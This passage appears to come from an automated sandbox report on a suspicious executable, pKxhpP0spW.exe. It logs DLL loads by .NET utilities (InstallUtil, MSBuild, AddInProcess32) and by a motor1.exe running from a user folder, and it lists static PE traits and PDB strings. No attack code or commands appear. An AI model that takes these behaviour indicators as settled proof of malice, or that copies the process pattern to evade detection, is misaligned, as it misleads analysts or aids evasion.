Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: glog.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: webuid.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndcrashhandler.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: d2d1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: dwrite.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndnetworking.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndapplocations.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndos.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndstring.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: dbghelp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndtime.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: cpr.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: msvcp140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: winhttp.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndfilesystem.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndexception.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndversion.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: version.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndhash.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: fndpointer.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: boost_filesystem-mt-x64.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\SystemRootDoc\motor1.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: pKxhpP0spW.exe Static PE information: More than 8191 > 100 exports found
Source: pKxhpP0spW.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: pKxhpP0spW.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: pKxhpP0spW.exe Static file information: File size 64617520 > 1048576
Source: pKxhpP0spW.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10f7e00
Source: pKxhpP0spW.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xef8600
Source: pKxhpP0spW.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pKxhpP0spW.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: pKxhpP0spW.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
